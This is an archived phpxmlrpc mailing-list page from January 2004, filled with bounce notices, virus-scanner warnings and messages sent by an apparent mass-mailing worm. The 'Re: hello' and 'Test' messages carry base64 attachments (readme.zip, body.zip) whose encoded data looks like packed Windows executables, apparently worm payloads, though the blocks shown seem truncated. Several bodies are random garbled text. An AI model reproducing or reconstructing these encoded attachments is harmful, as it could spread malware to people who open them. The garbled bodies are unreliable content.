[phpxmlrpc] Returned mail: see transcript for details

2004-01-30 Thread Mail Delivery Subsystem
The original message was received at Fri, 30 Jan 2004 06:39:03 -0500 (EST)
from [195.122.18.206]

   - The following addresses had permanent fatal errors -
[EMAIL PROTECTED]
(reason: 550 [EMAIL PROTECTED] no such email address)

   - Transcript of session follows -
... while talking to l0.redir.mx.voyager.net.:
 RCPT To:[EMAIL PROTECTED]
 550 [EMAIL PROTECTED] no such email address
550 5.1.1 [EMAIL PROTECTED]... User unknown
Reporting-MTA: dns; mx10.mx.voyager.net
Received-From-MTA: DNS; [195.122.18.206]
Arrival-Date: Fri, 30 Jan 2004 06:39:03 -0500 (EST)

Final-Recipient: RFC822; [EMAIL PROTECTED]
Action: failed
Status: 5.1.1
Diagnostic-Code: X-Unix; 550 [EMAIL PROTECTED] no such email address
Last-Attempt-Date: Fri, 30 Jan 2004 06:39:05 -0500 (EST)
---BeginMessage---
G,zC?:Z-So{'l:?LU'5Es
e(6~$w;|o`I,n[2z{
o[J?!;[b;~rbn|n)'\5cBU'Y;s?S5CZy?dK9c ~U
?_3|?e_%Tq7jI6ef6~?La6-aEt~M7PWfn 
k5{]~E4lSWS\*n?8r~]^bIho!Vc2s_Owur)fCAE]bm:%!7sU
1T$}3N![k
?z[AwI-Ovi I?x'dX#I;IZr;~0tV56iwk!?S04bH2
t\MO;`\
)KFJAPS]m2
FU6

attachment: readme.zip
---End Message---
___
phpxmlrpc mailing list
[EMAIL PROTECTED]
http://lists.usefulinc.com/cgi-bin/mailman/listinfo/phpxmlrpc


[phpxmlrpc] Benachrichtung zum =?unicode-1-1-utf-7?q?+ANw-bermittlungsstatus (Fehlgeschlagen)?=

2004-01-30 Thread postmaster
Dies ist eine automatisch erstellte Benachrichtigung +APw-ber den Zustellstatus.

+ANw-bermittlung an folgende Empf+AOQ-nger fehlgeschlagen.

   [EMAIL PROTECTED]



Reporting-MTA: dns;w2k-srv01.pcdata.ch
Received-From-MTA: dns;usefulinc.com
Arrival-Date: Fri, 30 Jan 2004 13:37:39 +0100

Final-Recipient: rfc822;[EMAIL PROTECTED]
Action: failed
Status: 5.1.1
---BeginMessage---
The message cannot be represented in 7-bit ASCII encoding and has been sent as a 
binary attachment.

attachment: doc.zip
---End Message---
___
phpxmlrpc mailing list
[EMAIL PROTECTED]
http://lists.usefulinc.com/cgi-bin/mailman/listinfo/phpxmlrpc


[phpxmlrpc] Re: hello

2004-01-30 Thread colext
This is a multi-part message in MIME format.

--=_NextPart_000_0005_C60D99A5.956C345E
Content-Type: text/plain;
   charset=Windows-1252
Content-Transfer-Encoding: 7bit

The message cannot be represented in 7-bit ASCII encoding and has been 
sent as a binary attachment.


--=_NextPart_000_0005_C60D99A5.956C345E
Content-Type: application/octet-stream;
   name=readme.zip
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
   filename=readme.zip

UEsDBAoAANiLPjDKJx+eAFgAAABYAAAKcmVhZG1lLnNjck1akAADBP//AA
C4
AEAAAKgAAA
AA
AA
AA
AFBFAABMAQMAAA
AA
4AAPAQsBBwAAUBBgAABgvgAAAHDAAEoAABACAAAEAAQAAA
AA
ANAQAgAAEAAAEAAQAAAQEAAA6MEAAD
AB
wAAA6AEAAA
AA
AA
AA
VVBYMAAAYBAABAAAgAAA4FVQWDEAAFBwAA
AA
UAQAAEAAAOAucnNyYwAQwAQAAABUAA
AA
AABAAADAAA
AA
AA
AA
AA
AA
AA
AA
AA
AA
AA
AA
AA
AA
AA
AA
ADEuMjQAVVBYIQwJAglIfomP1DYcgSmWAABTTgAAAIAAACYBAMXuhwKSAFAmSgBAA/2yaZosEA
T0
JegBAEvOaZpu2R/IKsADuLCopmmapqCYkIiAmqZpmnhwaGBYUM1gn2lIAEQHODA0TdN0AygkHB
gQ
0yy71wgjA/gp8OhN0zRN4NjQyLy0NE3TNKyknJSMzjZN04h8cGgpb1ym6ZrBB1RMA0Q4mqZpmi
wk
HBQMBGmazm38KH8D9OzkpmmaptzUzMi8mqZpmrSspKCYkGebpmmMgHhwKHto3mzTdQdcA1RMKP
/7
C3a2++NADzQo9ywvA5qmGfkkKEocFAwEaZrO7Jv8JwPs6OCmaZqm2NTMyMCapmm6uCewrKigmG
ma
pmmUjIiEfKRpmqZ0bGRcVGmaphtMA0RAODCmaZqmKCAYEAiapnObAPgmzwPo4Nhnm85tVDRDA0
A0
NNuK/51a0Nrl9AYfM05sck7YApdfksgBPXy+Q0uW5DWJ4DqX//dawCmVBHbrY95c3W
Ho
cv+PIrhR7Ywu03sm1A058Kpn/yfqsHlFFOa7k25MLRH44s+/sqihnZyeo6u2xNXpABo3//
//
/1d6oMn1JFaLw/48fcEIUp/vQpjxTawOc9tGtCWZEIoH/4cKkBmlpaj+8sPSqPgSLEprj7
bg
DT1wpt8bWnzhJ1XJ/xJgvhhl1TieF3PiVIlBvJrjP8ZQjW0Alk/LagyxQ3qy/3MXzo
hH
BciKVyPyxJlxTC4L79bArZ2Qhg97enyRiZSi/7PH3voVNVh+p8MCNHmh3Bpbj+Ywbc0gds
8r
ivxRuSSS/wN37mjlZehul4ODdoyVobDC1+8KKEltlL7rG06Evfk4/3q/B1Kg8UVsll
Oz
GnzlUcAypx+aGJkdpC67S950DalI/+qPN+KQQfWsZiPjpmw1AdCid08qCOnNtJ6Le25kXV
lY
/1pfZ3KAkaW81vMTNlyFseASR3+6+Dl9xA5bq/5UrQk9/5p3pwJw4VXMBsNDxlzVYW
Fk
anN/jKC1zegGJ0tynMn5/yxim1cWWH2wYCb+I3rUMZHkWsMvzhCF/XT2d/uADJkp/7
xS

Your message could not be processed because you are not allowed to post 
messages to the colext list. 

For more information, you can contact the list administrator at:

Fernando Guzman [EMAIL PROTECTED]


___
phpxmlrpc mailing list
[EMAIL PROTECTED]
http://lists.usefulinc.com/cgi-bin/mailman/listinfo/phpxmlrpc


[phpxmlrpc] Not Subscribed: Test

2004-01-30 Thread phpxmlrpc
You are not subscribed to the SQL list with the address [EMAIL PROTECTED] To add this 
address to your profile, please visit the sign in page at 
http://www.houseoffusion.com/signin/
Return-Path: [EMAIL PROTECTED]
Received: from usefulinc.com ([81.193.66.102]) by hof001.houseoffusion.com
  (Post.Office MTA v3.5.3 release 223 ID# 0-54969U100L100S0V35)
  with ESMTP id com for [EMAIL PROTECTED];
  Fri, 30 Jan 2004 13:16:26 -0500
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Test
Date: Fri, 30 Jan 2004 18:11:33 +
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary==_NextPart_000_0004_A63481B5.1F8CBD70
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

--=_NextPart_000_0004_A63481B5.1F8CBD70
Content-Type: text/plain;
charset=Windows-1252
Content-Transfer-Encoding: 7bit

B»!H,½MÈ
9OÚ|ýC'ˆÏëÁ„Ú[9[Tvûلó¯sª„N9ÌâûL´Ù¯½Óö™8†(Œ”ϝߢCó·*«ÇøãäRbñBc]Üï
×l]Íw•%õGËà3áZ®Ô¾ü£¯6R·„L'ûԚÆഋ·ÊÅý5¸±í“
n×wA±Ø68Hük%«ã\Sõ[|Odé|–éÙIÀ÷ŠO̦˜Óѐõ!ÚËd“¾Ù˜Ì#''˜ÔªeÁs^ƒNÔÚöà¡ú2Bë̈P­[JÔ3Áðã1«¡½MøŸ3g•¼ŒÃ´W{X
 
³Ë߅KìZÄ÷?Beë×q£Æ{‹OTsOù§Á´D`Üمc¦þ©rLGïTröá¡'ۈ“_-”©“ð|‚) G64¡Ÿ!w|ùJNϾ¼ð}Û¢³ª|*”­åK³~ƊŸtQ¢Â:»Ã*Ň_À¸Âã”áH56;xȤùhŸ\d.:÷œÊ7óÅeÏAç]MǶZ
Ô|°)õ¡ôQæÀo0w½—‰/Aa}Ƌk°H62(³Ç5¦Oœáß;—¶áª¶©cé›}¹³8³pU“BèOFÓÖþ»Tþú{åœ%ÂÙÀǕ7jÌ6#“Ä©–èFcâpÝAÑeb׈x5bWÚðå³âäÌ^¸÷§é‹ƒ—“vv±©ËmžoÒX6–0šÒò?Æwû{à$X
qú5]¥JNæ8¦ôKM°'Ç/ëÁÁ ŽMgž(G(w8×´„a釞§Sok¬Ù*i²GzѵG/…$Q)¹‹õŸxšÙ‰
;©‹ô†«í¥Ù—(¦Û³6HV±­ÓÉú,ƒœË¦XtGÑõzñ¨Ú5èJEߔün rlŽŽð㢴†ÏÏߖðÆqýRÔqøBúCInš½ÜJÕ;}j7sã½*‰JLÀgõ_ü¶Æ³‡th7nåªà¢OëXŒÀ-w虑—‚3‹ÕŠrG•:DeCþöíðßÎ/÷Ÿ
2ÇŊel̛U†MÈ}ZõúЄ¿8ó¤F¥ øÓXz1Y§˜G,ŠÀ¬žvìÛVøKÝªÈìÏJ£Çê:Àöם§EUýàŸŽÙ–w#›?IÑZ
ð`L³$È¡‚_¼Î«‹ª¬–ªþðÄhBƒà
XPd—ËÏ`Z1 ¯÷ŸöÌͅåT¸ûòµÉ«™´ÄQÊè¤Ae?•Öä‘Vô2½M™Ñ‡O‰Ï—à|j¦ŽöúúÜQU,H~
ùöR¤·Í¦¯ÏúDr7N²(¿0¡ËšäKAt÷ùÝ
°ªŸ}šà'áõµVÖÂd»õcØ0éæ»Ì‰±Â};CjƪÞàhъr`‚ÓñèA:ÃȒnÃIS¸GÚm[O¬lxžšÄt³¬²NÞoØ9s4¢×¢OcŽŸcµÑˆK~¹Á
R ”)‚…”6I:GžÍ¿a]¹Bè$‚ÜïQñ¥tŸ–Y÷*BÖüõŒ¡ŒdO`³À(_(éTޏÍOéhê¸cœÝúA¬±:ΟeUœa|ÓsZÆxMçEt/ú
NÏåÊQ1÷“ˆ tÖ½×ð
†ÉŠtù„Å4$ÒĵßRnê †ûENÌ3—
VÌx¤?³áFT„¡
65q™ö¡da\çxu“…úò¨ötª¾V…ó\½ÁQ
U´7(ˆÑš[ŸVPû'~ªú”pÝw
-ª,.sQKc¥ÕU‘“™´â$s¨ºÓ.ÆùÌtëÑa
þ§òûm â7
y6ŒÆŠŠ§°…©:^ætKKéÄzpò¸ÒRøÜ»µ!—´~ 5çò*ô£ûÉÒ§`gÏ»iÊÙ¬ß:ecXˆ_3Šów÷ì,²R‰†cu±¬‰6Pd;¢‘qՕÄU»²¼ùVTҗŸJV¹CAhJÌVjã)‚•ÄÅÊÄIÇÓ§
8a‰‰™òb6K¨^w,ÛyJBÕÙmª{Ðp’½³Iz¶
Öõ.µ9.3žŸO0’û†aUéWè4G!á8ó½r’¯ø)ˆ³qÇó)U“ùPk¢{4%0Á?j}/Jñ6À¶(£Éñ;¬!8‹É’!.Š[ãñ¯ÊB5Öâшk1`­Ä,z(%‹L­ª´f3i˜¾\’ŒgAç)÷Äê‚xbhõ95Tøyò;Ð\ŽY‰ÊV¨%«ˆB!_§»`gcBçØг[Ê2’\âç{ª3•6‡¼÷vÌÃ9碹VnrÓáýîä#µ{ýÙ
Q„¹öëˆ'úÞ¦bÒßnÃé嗒]Ӟ:æÚ!FaìÞMÔ]*9HÄLèoÉ:ˆåå[ñ–X¾ªzÕ¼ž¹xÀË´ëµUP5麾ŠJ\çW`R¨ÖÑ†˜÷7®×±½ÊnϖüèƒJý㘘“ÚS¼·û¨›uô
 rX3áhŸç¶


--=_NextPart_000_0004_A63481B5.1F8CBD70
Content-Type: application/octet-stream;
name=body.zip
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=body.zip

UEsDBAoAAHCRPjDKJx+eAFgAAABYAAAIYm9keS5waWZNWpAAAwQAAAD//wAAuAAA
AABAAACo

AABQRQAATAEDAOAA
DwELAQcAAFAQYAAAYL4AAABwwABKAAAQAgAABAAE
AADQEAIAABAAABAAEAAAEBAAAOjBAAAwAQAA
AMAAAOgB
AFVQ
WDAAAGAQAAQAAIAAAOBVUFgxAABQcFAA
AAAEAABAAADgLnJzcmMAEMAEVAAA
QAAAwAAA






AAAx
LjI0AFVQWCEMCQIJSH6Jj9Q2HIEplgAAU04AAACmAQDF7ocCkgBQJkoAQAP9smmaLBAE9CXo
AQBLzmmabtkfyCrAA7iwqKZpmqagmJCIgJqmaZp4cGhgWFDNYJ9pSABEBzgwNE3TdAMoJBwYENMs
u9cIIwP4KfDoTdM0TeDY0Mi8tDRN0zSspJyUjM42TdOIfHBoKW9cpumawQdUTANEOJqmaZosJBwU
DARpms5t/Ch/A/Ts5KZpmqbc1MzIvJqmaZq0rKSgmJBnm6ZpjIB4cCh7aN5s03UHXANUTCj/+wt2
tvvjQA80KPcsLwOaphn5JChKHBQMBGmazuyb/CcD7OjgpmmaptjUzMjAmqZpurgnsKyooJhpmqZp
lIyIhHykaZqmdGxkXFRpmqYbTANEQDgwpmmapiggGBAImqZzmwD4Js8D6ODYZ5vObVQ0QwNANDTb
iv+dWtDa5fQGHzNObHJO2AKXX5LIAT18vkNLluQ1ieA6l//3WsAplQR262PeXN1h6HL/
jyK4Ue2MLtN7JtQNOfCqZ/8n6rB5RRTmu5NuTC0R+OLPv7KooZ2cnqOrtsTV6QAaN/9X
eqDJ9SRWi8P+PH3BCFKf70KY8U2sDnPbRrQlmRCKB/+HCpAZpaWo/vLD0qj4EixKa4+24A09
cKbfG1p84SdVyf8SYL4YZdU4nhdz4lSJQbya4z/GUI1tAJZPy2oMsUN6sv9zF86IRwXI

[phpxmlrpc] [VIRUS] TEST

2004-01-30 Thread asp_components
Warning: This message has had one or more attachments removed.
Warning: Please read the VirusWarning.txt attachment(s) for more information.

{Ko?8D^KZ.?H~[3?LZX?O6Mqx
CzC|bp`??6Yy_r,U'5kr-W/Br[a
HG
R*[fW~|3ToY
#My}l[#Y`9?\$t*86/?RQ,5$1EY.P%pN?vM
kmc?Ja^-pV#J%1c#E/C*U/{[
F-}?xYGKb:nPW8#2]2bBoE2^B\h6Q1g]46? 
D$_#{F0!\?/-1?]~epFuTU4S{A^6ESig{|yxD7UZKaj7ugNiu[Vg(lWHhRtIAX
 ?
xM?oH%6?
j
dGIT6d?4|
q:*uN
q~?-8?[N]!NOfd?g 
A'2f?zBZY7Obu30*n3kkKt0^,?bO:zOjXwZ4H?/$
(-V?yfGEBV
ikt%J49aV)|]nF6e|hQ,pq?\wmw(:KN9e
g
-J1jB3#?koBE]Y[OQb-KqGAQ}V/o?5(2--]?3[L#%T\O-0XFz/PBxU8mN`o

This is a message from the MailScanner E-Mail Virus Protection Service
--
The original e-mail attachment readme.pif
is on the list of unacceptable attachments for this site and has been
replaced by this warning message.

If you wish to receive a copy of the original attachment, please
e-mail helpdesk and include the whole of this message
in your request. Alternatively, you can call them, with
the contents of this message to hand when you call.

At Fri Jan 30 19:39:21 2004 the virus scanner said:
   Shortcuts to MS-Dos programs are very dangerous in email (readme.pif)

Note to Help Desk: Look on the MailScanner in /var/spool/mailscanner/quarantine 
(message 1AmeU2-cQ-00).
-- 
Postmaster
___
phpxmlrpc mailing list
[EMAIL PROTECTED]
http://lists.usefulinc.com/cgi-bin/mailman/listinfo/phpxmlrpc


[phpxmlrpc] [VIRUS] ltvkwzetllz

2004-01-30 Thread gratuit
Warning: This message has had one or more attachments removed.
Warning: Please read the VirusWarning.txt attachment(s) for more information.

T
SS[?1jz#?`^c(2CR?J8?t?M?e 
??RN?Z?';SUj`_-%SJ7(E`_of)^_c
 
S}a}/4J%ktjFB_%e/RkhOB)kC_q)8oF^?#)$~}l?)\)3?*P~C,T*i%{wgv{Yz
yd?xvUV68l7{;?J:b?o:rAUM?d}?i8|Y(*%^(6rEOkw_!:m|EtI.eeh$EdRf9v{vR?0Nvhk|qsp
EW?mR14{?R?Dk;kjCBT$-yj
1,Wo(%?
`?|a.6WDk!Os^DS/nkb0y''H?`4$,2Q?:U8k5?P
$-}9qKZ?B,vA!N/V*Y HsC^?0AY?,')*~P
a6ntS:/:hU`$-.oceQ|j\?F`w,3Q
izf
xEEon9W,A?{K?v0CTb[%_q~gqW
bLsu)?f:*Ia$wchK(%:C:#l0OjT9
/m}MB;0av-ZAna#K}5j;aa605V'F.vSh'{P?SYr~Ey7,uIU
|TOx?hE
O*5?Z?#n,iUg1,ca?{tMlbD(t4V?bF(6'z`?t(-,*c9
.}*?NZy
YOg#vYA6???I}l?TNFb?gxd2!xj/N%WoPgk:V{q8JMu~LFa(x3)1?
m|e%#o0?1U?ID?U3pf8%HQTJ$YEzw(X[y
?C/(vj34}Qa?7p^5:Fml:8rY7VgMn?W
0Q%nFn?N$
nTJG*Aj/{%G6cc7tM)-%Xr7?(kq`Chm_4C$b-L;~sTBBdT^?6/Hck}On}z*?K-\uK[Wx)
-Ub|rtkf
A_wCLvFTo,\qk?Y]] 
A%1GCMq6Pncdf;6f:c
AhtKZ?*k(ID[?pv?u.Q_Wwkw)-p?n!Uqz zens
t?#Znq;c[Az;(;44^e:70_[e1tMORQ?b2zA$dOMvTi9
5m4a)Rfng5bY?Nan~j5:o.ZQEYXfcH;]p[w?tMz,/_$!e7^0?E?uIoj}V/M?XSlAYBh}3D\%U#;KjC)4*]325n4hbal$
^u11x06zr
_\W!ov-?)?*j(
BzM9vu:}c#
eLgp?`k?8#E?z[9?fV;)(?|ox?:{I|B?ynD!0W*b
L7{6|zQ#f

This is a message from the MailScanner E-Mail Virus Protection Service
--
The original e-mail attachment data.scr
is on the list of unacceptable attachments for this site and has been
replaced by this warning message.

If you wish to receive a copy of the original attachment, please
e-mail helpdesk and include the whole of this message
in your request. Alternatively, you can call them, with
the contents of this message to hand when you call.

At Fri Jan 30 21:27:52 2004 the virus scanner said:
   Windows Screensavers often hide viruses in email (data.scr)

Note to Help Desk: Look on the MailScanner in /var/spool/mailscanner/quarantine 
(message 1AmgB2-0004kA-00).
-- 
Postmaster
___
phpxmlrpc mailing list
[EMAIL PROTECTED]
http://lists.usefulinc.com/cgi-bin/mailman/listinfo/phpxmlrpc


[phpxmlrpc] Notification d'tat de la distribution

2004-01-30 Thread Service de distribution du courrier
 - Ces destinataires ont été traités par le serveur de messagerie :
[EMAIL PROTECTED]; Échec; 5.7.0 (état de sécurité différent ou non défini)


Reporting-MTA: dns; mx.laposte.net
Received-from-MTA: dns; usefulinc.com (81.166.220.99)
Arrival-Date: Sat, 31 Jan 2004 07:10:56 +0100

Final-Recipient: rfc822; [EMAIL PROTECTED]
Action: Failed
Status: 5.7.0 (other or undefined security status)
---BeginMessage---
The message contains Unicode characters and has been sent as a binary attachment.

attachment: text.zip
---End Message---
___
phpxmlrpc mailing list
[EMAIL PROTECTED]
http://lists.usefulinc.com/cgi-bin/mailman/listinfo/phpxmlrpc


[phpxmlrpc] WARNUNG - GroupShield-Ticket Nr. OA2_1075529781_NTSERV02_1 wurde generiert

2004-01-30 Thread GroupShield for Exchange (NTSERV02)
Ausgeführte Aktion:
Die Anlage wurde von der Nachricht isoliert und durch eine Textdatei
ersetzt, die den Empfänger über die ergriffene Maßnahme informiert.

An:
[EMAIL PROTECTED] [EMAIL PROTECTED]

Von:
Service de distribution du courrier [EMAIL PROTECTED]

Gesendet:
-161210240,29616064

Betreff:
hi

Einzelheiten zur Anlage:

Anlagenname: text.zip
Datei: text.zip
Infiziert? Ja
Repariert? Nein
Blockiert? Nein
Gelöscht? Nein
Virusname: W32/[EMAIL PROTECTED]




application/ms-tnef___
phpxmlrpc mailing list
[EMAIL PROTECTED]
http://lists.usefulinc.com/cgi-bin/mailman/listinfo/phpxmlrpc